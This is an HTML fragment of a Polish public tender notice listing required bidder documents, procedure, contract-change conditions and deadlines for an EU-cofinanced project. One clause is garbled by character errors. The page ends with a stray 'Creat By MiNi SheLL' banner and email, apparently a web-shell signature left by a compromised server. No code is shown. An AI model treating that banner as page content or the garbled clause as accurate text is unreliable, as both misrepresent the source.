<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)    Pełnomocnictwo do reprezentowania w postępowaniu, ( w przypadku podmiotów występujących wspólnie) - przygotowane zgodnie z zapisami części VII pkt. 4 SIWZ.
b)    parafowane projekty  umów  - załącznik nr 7.1 - 7.9 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian postanowień zawartej umowy w stosunku do treści oferty, na  podstawie której dokonano wyboru wykonawcy w przypadku:
    1) jeżeli wystąpiły okołfcznośd, których przy dotożeniu należytej staranności strony na dzień podpisania umowy przewidzleć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia;
2)  zmiany terminów realizacji zamówienia zgodnie ze zmianami w umowie o dofinansowanie, w szczególności w przypadku zmiany harmonogramu terminowego realizacji przedmiotowego projektu bez prawa do dodatkowego wynagrodzenia;
3)  konieczności przedłużenia lub skrócenia godzin rozpoczęcia i zakończenia poszczególnych zajęć w ramach projektu.
4)  nieprzewidzianych zdarzeń losowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2013 godzina 09:00, miejsce: siedziba Zamawiającego pok. 134  pietro I - Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com